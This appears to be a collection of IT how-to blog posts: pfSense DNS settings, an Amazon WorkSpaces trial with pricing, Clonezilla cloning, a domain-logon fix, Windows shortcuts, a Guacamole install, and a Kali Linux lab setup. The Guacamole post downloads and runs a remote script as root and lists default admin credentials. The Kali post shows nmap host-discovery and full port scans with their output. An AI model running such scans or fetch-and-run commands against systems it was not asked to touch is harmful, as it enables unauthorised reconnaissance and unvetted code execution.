How to set up pfSense with the new Secure and Private Cloudflare 1.1.1.1 DNS

How to set up pfSense with free Secure and Private DNS

You’re probably aware by now that Cloudflare and APNIC have begun to provide secure and private DNS – including DNS over HTTPS (DoH) – to the general public. You can learn more and read about the initiative here. This article will give a brief summary of why this is important, and how to configure your pfSense router to use these new addresses and disseminate them to your network clients.

By default, your Internet Service Provider (ISP) will provide your router with its own list of DNS server IP addresses when you first connect your device to the internet. DNS is used to find websites; it essentially just translates domain names to IP addresses and vice-versa. However, the DNS servers your ISP points you at may nefariously log and record your internet browsing history. In some cases, these servers may even inject advertisements into your web browser whether or not you’d like to see those ads.

By changing your router and/or computer to use 1.1.1.1 or 1.0.0.1 as its DNS resolver, you bypass your ISP’s DNS servers and get a secure and private response from Cloudflare. Cloudflare has a configuration guide for iOS, Android, macOS, Windows, Linux, and routers here. Follow the procedure below to set up a pfSense firewall/router to use Cloudflare DNS for its queries, and to have pfSense’s DHCP Server service hand out the new DNS IP addresses to your network clients.

  1. Log in to your pfSense firewall by pointing your web browser of choice to the login page (usually this is your default gateway IP address).
  2. At the Status / Dashboard page, in the upper left-hand menu, click System > General Setup
  3. Next, under DNS Server Settings, change the DNS servers in the first two fields to 1.1.1.1 and 1.0.0.1 respectively. Optionally, you can add 8.8.8.8 as a third IP address to use Google DNS in the event that the Cloudflare servers are unavailable, or are taken down by the government. It’s also a good idea to uncheck “Allow DNS server list override”. Once these changes have been made, scroll to the bottom of the page and hit Save.
  4. Next, if our pfSense is also being used as a DHCP server, we want our clients to get these IP addresses for their DNS server settings as well. To do so, at the top of the pfSense settings menu, click Services > DHCP Server.
  5. In the DHCP Server settings, scroll down to Servers, and edit the DNS servers to contain the two new Cloudflare DNS servers (1.1.1.1 and 1.0.0.1), as well as Google’s 8.8.8.8, if desired. Next, scroll to the bottom of the page and hit Save.
  6. Now would be a good time to restart your client computers to pick up the new DNS settings. You can confirm your computers have received the new addresses by opening a command prompt and issuing the command:
  7. ipconfig /all | more

    This will give you something like the following information:

  8. As you can see, our client has received the correct DNS server addresses from our pfSense DHCP server.
  9. To confirm our computer is actually sending its DNS queries to Cloudflare (1.1.1.1), we can issue another command at the command prompt:
    nslookup www.facebook.com

    And we can find in our results that the responding server is named 1dot1dot1dot1.cloudflare-dns.com, and its address is 1.1.1.1:
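If a client still appears to be using a different resolver, you can also query Cloudflare directly by naming the server explicitly in nslookup (the same syntax works on Windows, macOS, and Linux):

nslookup www.facebook.com 1.1.1.1

You can likewise test resolution from the firewall itself via Diagnostics > DNS Lookup in the pfSense web interface.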

In order to test that your DNS queries are indeed secure, you can use the link posted by John in the comments; thanks, John!

 

Amazon WorkSpaces – Overview, Proof of Concept, and Pricing

Overview and Whitepaper:

Using the AWS Management Console, you can deploy high-quality cloud desktops for any number of users.

Strategies and challenges for IT teams that deploy desktops (whitepaper):

Strategy challenges:

  • Timely employee request fulfillment
  • Supporting contractors and temporary staff with a productive workspace
  • Merger and acquisition assistance
  • Increased application development and engineering activity
  • Provide and manage temporary desktops

Greatest Challenges:

  • Security of endpoints
  • Threat Detection/Prevention
  • Corporate file access and protection
  • Improve collaboration
  • Maintain compliance
  • Complexity of technology
  • Managing a heterogeneous device environment
  • SSO to corporate apps
  • Rogue employee devices
  • Rogue applications housing corporate data
  • Supporting LOBs and executive devices and apps

On-Premises Virtual Desktop Infrastructure (for example, building out Terminal Server or Citrix VDI)

Upsides to On-Premises Virtual Desktop Infrastructure:

  • Simplified, centralized management – hosted, managed, and executed in one place
  • Efficient provisioning and de-provisioning with standardized images allowing quick revoking of access
  • Centralized image management, proactive detection, rapid quarantine of suspicious behavior

Downsides to VDI:

  • Complex infrastructure that is difficult for IT to plan, configure, manage, and maintain.
  • Unfavorable economics that tip the ROI equation in the wrong direction, with unused capacity, heavy upfront costs, and cumbersome operations
  • Unpredictable access for global users, depending on their proximity, where limited network bandwidth leads to unacceptable latency
  • Time-consuming implementations that involve multiple IT disciplines and months of planning, testing, and staging of infrastructure.
  • Difficult root cause analysis among multiple IT teams.

Amazon WorkSpaces Desktop as a Service (Hosted Desktop Service): a Viable Alternative to VDI

Employee Benefits:

  • Employees not tethered to traditional desktops or laptops.
  • No cumbersome VPN connections
  • Increased collaboration and communication with simplified virtual workspaces

Business Benefits:

  • Rapid scale up or down; new employees, mergers and acquisitions, global growth
  • Integrate, consolidate, and deliver services and apps
  • Reduce capital expenditures and operational costs, and streamline IT maintenance and infrastructure management

IT Benefits:

  • Ability to meet security policy requirements and compliance standards by using protocols to compress, encrypt, and encode data so only images are transmitted and data no longer resides on local devices.
  • Enables creation of developer-style environments, granting developers quick and secure access to end-user environments for seamless dev testing, without impeding user productivity.
  • Allows devs to move fast and fail fast with access to desktop resources when they need them.
  • Keeps business data secure, centrally managed, and accessible to users.
  • Places productive workspace in the hands of end-users near instantaneously, while supporting secure access from multiple device types.
  • Manages apps centrally with the ability to securely package, deploy, and maintain a productive user environment.
  • Deliver a productive environment for users without the task of configuring a desktop asset.

Proof of Concept 

*Note: our org already has a VPN connection between Amazon AWS and our on-prem domain and domain controllers. This allows me to find our domain with Amazon’s connector. Review the architectural diagram below to ensure you’re comfortable with how WorkSpaces can fit into your AWS presence and VPCs.

  1. Log into AWS > WorkSpaces > Get started
  2. Create AD connector (use Administrator account to connect) – also add WorkDocs Sync feature
  3. Create New Workspace > Choose Directory (local.domain.com) > search for user > jcoltrin (username: domain\jcoltrin) > add selected > Next > Select: Standard with Windows 7 (later I will add MS volume license for Office and other applications and then create an image.)
  4. I choose Performance: 2 vCPU, 7.5 GiB Memory – Hourly
  5. Download the Workspaces client here: https://clients.amazonworkspaces.com/
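As an optional check (this assumes the AWS CLI is installed and configured with credentials that can see WorkSpaces; it is not part of the console flow above), you can confirm the new WorkSpace’s state from the command line:

aws workspaces describe-workspaces --query "Workspaces[*].[UserName,WorkspaceId,State,BundleId]" --output table

The WorkSpace should show a State of AVAILABLE once provisioning completes.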

I sent myself the connection email which looks like the following:

————————-

Dear Jason,

A new Amazon WorkSpace has been provided for you. Follow the steps below to quickly get up and running with your WorkSpace:

1. Download and install a WorkSpaces Client for your favorite devices:

https://clients.amazonworkspaces.com/

2. Launch the client and enter the following registration code: XXxxXX+xxXXxx

3. Login with your Network/Domain password. Your username is jcoltrin

If you have any issues connecting to your WorkSpace, please contact your administrator.

Sincerely,

Amazon WorkSpaces

————————–

After verifying the registration code, log into the new virtual workspace with your domain credentials:

After logging in you may receive the following notice if resuming the workspace:

After logging in I received the following desktop:

Notice the following in the desktop image:

  • Network Drives mapped
  • Local and Remote Printers are created
  • Corporate desktop background
  • The computer is now a member of the domain with the computer name IP-AC1F5261
  • Icons available for AWS applications and Directory Sync (share files with my local workstation)

Finalizing for Production and Production Notes:

  • Finalize image with all necessary applications and test. Build your gold Images
  • Enlist a user to test running the workspace in production and adjust applications/workspace as necessary
  • Deploy to a set of users.
  • Rent before buy, buy before build.
  • Aligned with cloud technology
  • Builds on existing AWS infrastructure
  • Straightforward architecture
  • Give it to users and see how they like it
  • Multi-Region vs. Single Region – within each region are Availability Zones. WorkSpaces is not available in every region; when building your VPC, figure out which subnets support WorkSpaces.
  • Subnets are fixed; build to allow for growth.
  • WorkSpaces are attached to AD Connectors. You cannot move an existing WorkSpace between AD Connectors. If an Availability Zone becomes unavailable, its WorkSpaces are unavailable, so use multiple Availability Zones to allow for this.
  • Only allow Windows devices with certificates to connect, etc. You’re going to have several AD Connectors: have a production AD Connector and a testing AD Connector, and set up a pure sandbox somewhere else for testing.
  • Each AD Connector drops computers into a single OU; one option is a separate AD Connector per department (e.g., only Accounting can connect from a certain department, or authentication is allowed only on-prem, not from outside). Create an AD Connector for consultants that drops them into a separate subnet with monitoring.
  • WorkSpaces IP addresses persist for the life of the WorkSpace, even across rebuilds; you cannot assign IPs yourself.
  • Use one VPC for WorkSpaces.
  • Better segregation between the work and personal sides of things. BYOD is nice – a single pane of glass. Devs get good separation.
  • This gets Windows on a Mac better than Boot Camp.
  • Reduced operational overhead: lightweight devices can be dropped in the mail ready to go – just send the registration code. People line up to get on board, and even tougher-to-please users are ecstatic about WorkSpaces. Once implemented, IT itself will not want to go back.
  • Run pilots.
  • Replace end-of-life desktops
  • Great for Mergers and acquisitions
  • Users could connect with Zero client at the office and Home computer at home
  • Allow deployment of Zero clients in all facilities and retrofits
  • Hoteling/shared workspace areas. Smaller sites only need internet connectivity, not a WAN-enabled site.
  • Scalable and global
  • No upfront CapEx
  • Capacity-on-demand
  • Rate of innovation – customers drive features at Amazon
  • Instrumentation and controls – complexity and cost of on-prem is daunting
  • Cost savings – financial benefits – get out of the business of providing physical PCs; building and configuring a VDI service is complicated and costly, so focus on the service, not the infrastructure.
  • WorkSpaces API & CLI integration
  • Same image/applications leveraged across multiple geos, with the ability to grow into other areas
  • Having desktops in the cloud makes it easier to keep them patch-compliant
  • Enables support staff opportunities – support users all over the world with help desk reps
  • Enable end users – automate the whole thing and allow users to migrate their own data.

Pricing:

https://aws.amazon.com/workspaces/pricing/

https://aws.amazon.com/directoryservice/pricing/

There are two main options for Workspaces, Monthly pricing and Hourly Pricing.

At 160 hours per month, a “Performance-grade” WorkSpace under the Hourly pricing model would cost $7.25 + (160 × $0.57) = $98.45.

The same “Performance-Grade” workspace under the “Monthly” pricing would cost $55.

$55 x 12 months = $660

A new Dell 7050 PC typically costs $800

So it would take approximately 15 months of monthly payments to reach the cost of a normal desktop PC.
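It’s also worth noting where hourly and monthly pricing break even. For the Performance bundle, the hourly plan costs $7.25 + ($0.57 × hours) per month, so it matches the $55 flat rate at roughly (55 − 7.25) / 0.57 ≈ 84 hours of use per month; below that, hourly pricing is cheaper, and above it the flat monthly rate wins.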

Hardware Options

Value | Root Volume | User Volume | Monthly Pricing | Hourly Pricing
1 vCPU, 2 GiB Memory | 80 GB | 10 GB | $25 | $7.25/month + $0.22/hour
1 vCPU, 2 GiB Memory | 80 GB | 50 GB | $28 | $9.75/month + $0.22/hour
1 vCPU, 2 GiB Memory | 80 GB | 100 GB | $31 | $13/month + $0.22/hour
1 vCPU, 2 GiB Memory | 175 GB | 100 GB | $36 | $19/month + $0.22/hour

Standard | Root Volume | User Volume | Monthly Pricing | Hourly Pricing
2 vCPU, 4 GiB Memory | 80 GB | 10 GB | $33 | $7.25/month + $0.30/hour
2 vCPU, 4 GiB Memory | 80 GB | 50 GB | $35 | $9.75/month + $0.30/hour
2 vCPU, 4 GiB Memory | 80 GB | 100 GB | $38 | $13/month + $0.30/hour
2 vCPU, 4 GiB Memory | 175 GB | 100 GB | $44 | $19/month + $0.30/hour

Performance | Root Volume | User Volume | Monthly Pricing | Hourly Pricing
2 vCPU, 7.5 GiB Memory | 80 GB | 10 GB | $55 | $7.25/month + $0.57/hour
2 vCPU, 7.5 GiB Memory | 80 GB | 50 GB | $57 | $9.75/month + $0.57/hour
2 vCPU, 7.5 GiB Memory | 80 GB | 100 GB | $60 | $13/month + $0.57/hour
2 vCPU, 7.5 GiB Memory | 175 GB | 100 GB | $66 | $19/month + $0.57/hour

Power | Root Volume | User Volume | Monthly Pricing | Hourly Pricing
4 vCPU, 16 GiB Memory | 80 GB | 10 GB | $70 | $7.25/month + $0.68/hour
4 vCPU, 16 GiB Memory | 80 GB | 50 GB | $72 | $9.75/month + $0.68/hour
4 vCPU, 16 GiB Memory | 80 GB | 100 GB | $74 | $13/month + $0.68/hour
4 vCPU, 16 GiB Memory | 175 GB | 100 GB | $78 | $19/month + $0.68/hour

Graphics | Root Volume | User Volume | Monthly Pricing | Hourly Pricing
8 vCPU, 15 GiB Memory, 1 GPU, 4 GiB Video Memory | 100 GB | 100 GB | – | $22/month + $1.75/hour

Additional Storage: $0.10/GB

Conclusion

Overall, I really like WorkSpaces; it was simple to set up and run. I believe the remote workspace from AWS can work very well for the enterprise: it provides the flexibility to expand, makes it easy to create different images for different users, and keeps data safe at AWS by only sending graphics/pixels over the wire. People can use their own BYOD devices, such as Chromebooks, to perform their jobs.

The only drawback I’ve encountered is that WorkSpaces does not provide pass-through video/camera devices for Skype video calls. If a user needs to use Skype or other video conferencing, they will have to start their call “outside” of WorkSpaces.

Let me know what you think about the product and this write-up.

How to clone a Dell Optiplex 7050 M.2 NVME Hard Drive with Clonezilla and an External USB HDD

I ran into trouble when trying to clone a new Optiplex 7050. My normal procedure for cloning with Clonezilla required a little tweaking to accommodate Windows 10, UEFI, the NVMe M.2 drive, Secure Boot, and RAID On. Follow the procedure below to clone your systems on these newer hard drives and BIOS versions.

As a side thought, I enjoy using Clonezilla and have used it for many years. I love the convenience of it and not having to manage Windows images with something like SCCM. While SCCM has a place in some organizations, I believe it’s perfectly fine to use Clonezilla to create OS images of different models of computers. I have approximately 15 different OS images, everything from Lenovo laptops to Dell Optiplex 380s to Optiplex 7050s.

Requirements:

  • 1 x USB 2.0 or 3.0 thumb drive, minimum 2 GB capacity, made bootable with the 20170905-zesty version of Clonezilla
  • 1 x USB 3.0 external HDD with a capacity larger than the TOTAL size of your M.2 NVMe drive (I use a 4 TB Western Digital My Passport). In my previous experience, Clonezilla wrote images containing only the used space on the source HDD; with UEFI / NVMe drives, however, the image created on disk is the total size of the NVMe drive.
  • 2 x Dell Optiplex 7050 (Source and Target) computers
  • 1 x Separate PC or laptop you can use to create a bootable USB Clonezilla Thumb Drive

1. Configure your Source Windows 10 Dell Optiplex 7050 machine as necessary. Install all applications, create user accounts, and uninstall bloatware. Make sure you create an administrator user account and password. In final preparation for cloning, either run Sysprep (found in C:\Windows\System32\Sysprep), or alternatively ensure you shut down Windows 10 completely by creating a "shutdown /s /t 0" shortcut and executing it.

2. On a separate PC, download Rufus which we’ll use to create a bootable USB thumb drive.

3. On a separate PC, download the AMD64 version of the alternative (Ubuntu-based) Clonezilla release, as outlined on the Clonezilla website (this version is required for newer BIOSes):

4. Change the file type to ISO and hit Download.

5. Attach your USB thumb drive to the separate computer, run Rufus, select the drive you just attached under Device, and point Rufus to the .iso file you just downloaded.

6. Hit Start and the bootable USB thumb drive with Clonezilla will be created.

7. On the Source computer, insert the USB thumb drive into one of the front panel’s top (black) USB ports, and insert the USB External HDD separately into the Blue USB 3.0 port. Attach the keyboard, mouse, power, and monitor.

8. Power on the Source computer and start mashing the F12 key on the keyboard to get to the one-time boot menu.

9. Before we begin, we need to make sure clonezilla can find our NVME HDD. By default UEFI and Secure Boot will be enabled. We need to disable these as well as Boot Path Security so that we can continue.

10. Select Setup from the Boot Menu:

11. In the BIOS, under the General Heading, select UEFI Boot Path Security and change it from Always to Never.

12. Next change System Configuration > SATA Operation from RAID On to AHCI

13. Lastly, change Secure Boot > Secure Boot Enable “Enabled” to “Disabled”

Apply, Save and Exit the BIOS. On the next boot, start mashing the F12 key again and this time select UEFI: USB DISK 2.0 PMAP

Clonezilla will boot from the USB drive so choose the default (hit Enter):

Select English > Don’t touch keymap > Start Clonezilla > device-image (Ok)

Under Mount Clonezilla image directory, choose Local_dev (Ok)

Press Enter to continue.

Review the clonezilla Scan disk preview to ensure it’s found both your Source and Target hard drives:

Press Ctrl-C to continue.

Arrow down and select your large external USB hard drive (sda1) to set the location of /home/partimag. This is where the clone image will be stored.

In the Directory Browser, hit “Browse” and go to your Parent Directory (top-most level) and select Done. This is where your image will be saved. You can see in my screenshot I’ve already saved an image here.

You will get a summary showing the source (/dev/sda1) and target (/home/partimag) locations. Press Enter to continue.

Choose Beginner mode

Choose Save Disk (Save_local_disk_as_an_image). In my previous experience with Clonezilla on normal spinning HDDs and even SSDs, I’ve used Samba to save my images to a separate server over gigabit Ethernet perfectly fine. However, with these new computers and hard drives, I would get a permissions error when selecting SAMBA/SMB 2.1: the imaging would begin and a couple of smaller partitions would copy, but as soon as the primary large partition started its copy, I would get the permission error and the clone would halt. This is why we are using a local external USB hard drive.

Give a descriptive name for the image (Dell7050_NVME_256GB_DATE-IMG) hit OK.

Select the local disk as source (should only be one here)

Select -sfsck (Skip Checking)

Select Yes, check the saved image

Select -senc Not to encrypt the image (or encrypt if desired)

Select Action to perform when everything is finished: -p power off.

Press Enter to continue, (Yes/Yes) – the image process will run and the image of the Source PC will be written to the External USB HDD. The machine should shut down when complete.

Image Target Computer

Now that we have our image saved on our external HDD, we can image our Target PC. On the powered-off PC, connect the USB thumb drive, external HDD, keyboard, mouse, and monitor, and again boot into the BIOS.

On the new target computer, we want to again change the BIOS settings to mirror those we made in steps 11, 12, and 13.

After saving the BIOS, restart and hit F12 again, select the USB thumb drive, and boot Clonezilla.

Start Clonezilla > Device Image > Local_dev > select image repository (sda1) > in Directory Browser, browse to the image we created, highlight it and select Done:

Choose Beginner Mode > Restore Disk:

Choose the image to restore:

Select the target disk to restore onto (Should only be one listed here):

Select “Skip checking the image before restoring” > poweroff > Enter >

Heed the warning here. If important data is on the target disk, do not proceed. All data will be overwritten:

Hit y (enter) > y (enter) >

Partclone will run, clone the image to your disk, then shut down:

With the system powered down, remove your external HDD and boot thumb drive.

Power on the newly-imaged PC and hit the F12 key to go into the BIOS again. Reverse the changes made in steps 11, 12, and 13, save the BIOS settings, and boot normally into Windows. Congrats, you’re done! Hope this helps someone clone their newer systems with Clonezilla.

Solved – Dell Latitude 7370 cannot login to domain – No Logon Servers available

Solved – Windows 7 – WiFi login: There are currently no logon servers available to process your logon request.

I had an associate drop a Dell Latitude 7370 laptop on my desk saying he cannot print. I found that the user is able to log on to the local workstation desktop using cached credentials but cannot log on to the domain. He is only logging into the laptop with his cached credentials, is not authenticating with the domain, and therefore cannot print. Logging off of the user’s account and then trying to log in as myself, I get the error:

“There are currently no logon servers available to process your logon request. “

I log in with his cached credentials again, right-click on the WiFi adapter, and choose Troubleshoot, but it can’t find any problems. I occasionally and intermittently get the “Windows needs your current credentials” pop-up notification in the lower right near the clock/systray, but clicking on that icon does not do anything. I even set the wireless network adapter’s TCP/IPv4 properties to use the DNS IP address of the domain controller explicitly instead of getting the setting from DHCP, but still, the laptop is unable to log in to the network with the new domain password I set for the user’s account.

There is definitely something wrong with the wireless adapter. I notice that when disconnecting/reconnecting to the wireless SSID, the Intel WiFi drivers pop up stating that I’m connected and that there is signal strength. Knowing that Intel drivers sometimes try to do too much and interfere with wireless connections, I do the following and fix the issue.

  1. Uninstall the Intel WiFi driver packages from Windows Control Panel > Programs and Features. (I uninstalled both the WiDi package as well as the Intel WiFi drivers package.) This removes the device from the Device Manager.
  2. In Device Manager, right-click on Network Adapters and choose “Scan for hardware changes.” This, in turn, finds the WiFi network adapter, but it does not have drivers yet.
  3. Go to https://support.dell.com, type in the Service Tag, find the drivers section, and download the following driver: Intel-8260-7265-3165-7260-WiFi-Driver_YM1PH_WIN_20.10.1.1190_A24.exe
  4. Run the .exe and, when it asks whether to install the driver or extract, choose Extract Only. Make a new folder under the root of the C: drive and finish the extraction there.
  5. Back in the Device Manager, right-click on the WiFi adapter and choose “Browse my computer for driver software”.
  6. Point to the location of the extracted drivers, finish the installation, and log off. The laptop can now find the logon server/domain controller and the user is back in business.

For some reason the full driver suite for this model of laptop interferes with DNS, and the laptop cannot find the logon server or log in to the domain. By extracting the drivers only and telling Device Manager to use just the .inf files for the device, we circumvent the driver suite and get our adapter talking to the domain controller for authentication.
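If you hit this again, a quick way to confirm the client can actually resolve and reach a domain controller (the domain name below is a placeholder for your own) is from a command prompt:

nslookup -type=SRV _ldap._tcp.yourdomain.local
nltest /dsgetdc:yourdomain.local
echo %LOGONSERVER%

The first command checks that DNS can return the domain’s LDAP service records, the second asks the Netlogon service to locate a domain controller, and the third shows which logon server (if any) handled the current session.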

Windows 10 Fall Creators Update – New Keyboard Shortcuts

Some new Windows Keyboard Shortcuts in Windows 10

With the release of the Windows 10 Fall Creators Update, version 1709, come more bells, whistles, tricks, and shortcuts for us to dig into and explore. In this article, we’ll look mostly at the Windows Key shortcuts available and how the shortcuts and key combos can help us in our daily workflow.

  1. In the event you’re not already aware, the Windows Key on your keyboard (usually between the Ctrl and the Alt keys in the lower left area of most keyboards) has lots of capabilities when held down while pressing other keys on the keyboard. Pressing this key on its own launches the Start Menu:
  2. Windows Key + A – Brings up the Windows Notifications SideBar. Here we can find existing notifications, switch to tablet mode, get into the windows settings panel, join a WiFi network, and change our location settings.           
  3. Windows Key + B – Select / Activate the Systray / Show Hidden Icons Expansion menu. This can come in handy as a few applications run as services and can only be accessed by right-clicking on the icon in the Systray; if your mouse stops working, this is a good shortcut to know.         
  4. Windows Key + C – Opens Cortana in Listening Mode. “Hey Cortana!” This is disabled by default and can be activated in the Cortana settings (enable it in Cortana > Menu > Notebook).
  5. Windows Key + D – Show the desktop
  6. Windows Key + E – Open File Explorer
  7. Windows Key + F – Open the Feedback Hub and Take a screenshot (this didn’t work for me)
  8. Windows Key + G – Open the X-Box Game Bar
  9. Windows Key + H – Open the Dictation control bar 
  10. Windows Key + I – Opens the Windows 10 Settings
  11. Windows Key + J – Sets focus to Windows Tips when one is available (Turn off tips in Settings > Notifications & Actions) 
  12. Windows Key + K – Open the Connect Quick action (connect to a wireless projector)                                            
  13. Windows Key + L – Lock your PC or Switch Accounts
  14. Windows Key + M – Minimize all windows
  15. Windows Key + O – Lock the device orientation (helpful for tablets)
  16. Windows Key + P – Choose a presentation display mode (Sidebar Projectors tool) 
  17. Windows Key + Q – Quick file search
  18. Windows Key + R – Open Run dialog box
  19. Windows Key + S – Open Windows Search (same as Windows Key + Q)
  20. Windows Key + T – Cycle through apps pinned to the taskbar (cycle in reverse is Windows Key + Shift + T)
  21. Windows Key + U – Open Ease of Access Center
  22. Windows Key + V – Cycle through windows notifications
  23. Windows Key + W – Opens the Windows Ink Workspace
  24. Windows Key + X – Opens the Quick Links Menu (right-click on the start menu) 
  25. Windows Key + Y – Switch input between Windows Mixed Reality and desktop (Your PC may not meet the minimum specs for Windows Mixed Reality)
  26. Windows Key + Z – Shows menus or commands available when an app is in full-screen mode.
  27. Windows Logo Key + period (.) or semicolon (;) – Opens the Windows 10 emoji panel 👍
  28. Windows Key + Comma (,) – temporarily peek at the desktop
  29. Windows Key + Pause/Break – Opens the System Properties
  30. Windows Key + Ctrl + F – Search for Active Directory computers on a network
  31. Windows Key + Number/Shift/Ctrl/Alt – Manage TaskView Virtual Desktops

I’m sure there are more so let me know in the comments if I missed any and let us know which are your favorites (mine is Windows Key + Pause/Break)

Setup Guacamole Remote Desktop Gateway on Ubuntu with one script

How to replace RDP, SSH and TeamViewer with a free, open-source, web-based, clientless remote desktop gateway.

I recently learned about Guacamole and found that the setup is quite easy. I had been looking for a way to access all of my virtual and physical machine desktops remotely, but didn’t want to rely upon or trust TeamViewer forever. Guacamole is open-source software that provides a Tomcat/Apache/MySQL server suite that sets up and brokers remote desktop connections via a web browser, very much like TeamViewer. It allows you to connect to any number of different desktops with just an HTML5 web browser and a single open port on your firewall. You can use Google Authenticator 2FA to log into a console that has access to all your desktops, without having to install or configure remote clients such as PuTTY, RDP, or VPN software. If you’re attempting to use VNC, though, there will be some initial configuration of the VNC server on the client side – I found that UltraVNC Server works best with Guacamole; more on that later.

The installation documentation on the official site is comprehensive, but I was able to set up the system quickly thanks to Chase Wright’s post here. To be clear, this is not “my script”; I’ve written this article as a tutorial/guide.

First, you’ll want a standard Ubuntu server or virtual machine installed and running. I installed Guacamole on Ubuntu Server 16.10.

Second, open an ssh connection to your server and run the following commands:

sudo su -
wget https://raw.githubusercontent.com/MysticRyuujin/guac-install/master/guac-install.sh
chmod +x guac-install.sh
./guac-install.sh

The installation will take a little while to download and install, and should only prompt you to provide a MySQL database password.

For me, that was pretty much it for the initial setup. Next, I went to a different computer and connected to the guacamole gateway at the following default website:

http://serverIPaddress:8080/guacamole (replace serverIPaddress with your ubuntu server’s IP)

Log in with the default Guacamole username/password: guacadmin/guacadmin

The initial interface is a little sparse, but to create an RDP connection do the following:

  1. Create a new user first, before you create a connection, because by default Guacamole will launch the assigned desktop session the next time you log in, and if there’s a problem with the connection you may get stuck. This happened to me and I was stuck on the error:
    “Connection Error: An internal error with Guacamole server, and the connection has been terminated”

    It took a little digging, but essentially the server console is up and running behind the black screen/pop-up, and you can get back into the settings by going to the URL: http://serverIPaddress:8080/guacamole/#/settings/sessions

  2. Create the user first by going to the menu in the upper right-hand corner and choosing Settings:
  3. Next, click the Users tab and then New User:
  4. Next, provide a username, a password (twice), give this new user all permissions, and hit Save at the bottom:
  5. With this new user created, you will now want to log in as this new user and change the guacadmin account password.
  6. Now we can create our first connection. Before you create your first RDP connection, be sure to test the RDP account credentials from a different computer to ensure you can connect successfully.
  7. Click on the Connections tab and then New Connection. The only things I had to set up to get my workstation RDP connection working were the following:
  8. Hit Save at the bottom. There are many additional settings available, but this should get you up and connected.
  9. Now we want to assign this connection to a user. Do that by going into the Users tab again, finding the user, and assigning the connection:
  10. Now go to a different computer from the one you want to connect to, browse to the http://serverIPaddress:8080/guacamole site, log in as the user with the connection assigned, and you should be greeted with the RDP console of the remote computer.
  11. To set up an SSH connection it’s even easier. Again, first create a new user with the same name as the SSH server you want to connect into (I named my user HN-DHCP01). Then create a new connection and name it the same as your server. Below are the Guacamole SSH connection settings I used to connect to my DHCP01 server:
  12. Under the Authentication setting, provide a valid SSH user’s credentials for the server you’ll be connecting into.
  13. Hit Save at the bottom. Go back into the Users tab, select the new user (HN-DHCP01), assign the connection to the user at the bottom, and hit Save.
  14. Log out of Guacamole, then log in as the new user (HN-DHCP01); this will instantly log you into an SSH session that, as you can see in the screenshot below, runs right in the browser!
  15. Guacamole also supports two-factor authentication as well as a multitude of additional setups and configurations. It’s wise to set up 2FA prior to opening any firewall ports into your local network from the internet, and to make sure that you follow all security precautions and test everything thoroughly.
  16. When configuring VNC for use as remote support with Guacamole, I’ve found UltraVNC Server works best for Windows clients. It’s a little tricky to set up on the client side and get it to run consistently across all flavors of Windows 7 and Windows 10 feature releases.
  17. Enjoy your guacamole, and let me know in the comments if I’ve missed anything.

Installing Kali Linux on ProxMox – Building a Penetration Test Lab – Part 2

In the process of building a penetration test lab, I wanted to get started with the installation of a Kali Linux virtual machine running on ProxMox. To get started, first download the latest version of Kali Linux (ISO) here. Grab this version:

Kali 64 bit ISO | Torrent 2.6G 2017.1

Build your new VM (Proxmox > Create VM) using the ISO you’ve downloaded.

According to other users’ accounts of Kali not working after installation, it’s recommended to change the display type to be VMware-compatible. After building the VM, change Hardware > Display > Edit > and choose VMWare compatible:

Kali installs onto a virtual hard drive on ProxMox (we will not be running a “live” version of Kali). Start the new VM, scroll down the menu, and choose Install (not GUI install).

During installation, when the installer asks where to have GRUB installed, choose “select your own location.”
Manually enter the path: /dev/sda
Otherwise, if you choose the default or the path already listed, then after completing the installation and restarting you’ll get the message “Booting from Hard Disk”, the boot sequence will not complete, and the VM will essentially hang.

Once Kali has completed its setup, I boot the Kali VM, log in, and land on the desktop.

Run apt-get update and apt-get upgrade to update the packages on your system.

Before we go on to complete the setup of the rest of our lab with known-vulnerable hosts, let’s run some cursory nmap scans.

Let’s run a ping scan on our own network with the command:

nmap -v -sn 10.0.10.0/24

This says: nmap, print verbose output (-v), do a Ping Scan (-sn) – (disable the default port scan for each address), and use the network 10.0.10.0 with a CIDR of /24.

This scan will attempt to ping all 254 addresses. The highlights of the scan are below:

root@HN-kali01:~# nmap -v -sn 10.0.10.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:13 PDT
Initiating ARP Ping Scan at 15:13
Scanning 255 hosts [1 port/host]
Completed ARP Ping Scan at 15:13, 1.95s elapsed (255 total hosts)
Initiating Parallel DNS resolution of 255 hosts. at 15:13
Completed Parallel DNS resolution of 255 hosts. at 15:13, 5.53s elapsed
Nmap scan report for 10.0.10.0 [host down]
Nmap scan report for pfSense2x.jasoncoltrin.local (10.0.10.1)
Host is up (0.00048s latency).
MAC Address: 62:65:B1:30:52:A7 (Unknown)
Nmap scan report for 10.0.10.2 [host down]
Nmap scan report for 10.0.10.3 [host down]

...
...
Nmap scan report for 10.0.10.51
Host is up (0.00049s latency).
MAC Address: 18:03:73:34:34:36 (Dell)
Nmap scan report for 10.0.10.52 [host down]
Nmap scan report for 10.0.10.53 [host down]

So here we see that the scan detected my pfSense virtual machine firewall on IP 10.0.10.1, and gave me the MAC Address.

Let’s take a closer look at the Dell workstation found on 10.0.10.51. To do so, let’s run a port scan:

nmap -p 1-65535 -sV -sS -T4 10.0.10.51

This scan does the following:

Run a full port scan on ports 1-65535, detect service versions, run a Stealth Syn scan, use T4 timing and the target of the scan is IP 10.0.10.51.

Below are the results:

root@HN-kali01:~# nmap -p 1-65535 -sV -sS -T4 10.0.10.51

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-04 15:17 PDT
Nmap scan report for 10.0.10.51
Host is up (0.00047s latency).
Not shown: 65528 filtered ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
2179/tcp  open  vmrdp?
27036/tcp open  ssl/steam    Valve Steam In-Home Streaming service (TLSv1.2 PSK)
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 18:03:73:34:34:36 (Dell)
Service Info: Host: JCDESKTOP; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.84 seconds

Because I don’t always like to use my new Kali VM via the ProxMox console, I want to run my Kali desktop over VNC & SSH. Here is a good resource for learning how to connect to your Kali Linux system with VNC over a secure SSH connection:
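The short version is to tunnel the VNC port over SSH. A minimal sketch, assuming a VNC server is already listening on display :1 (port 5901) on the Kali VM, and substituting your VM’s actual IP address:

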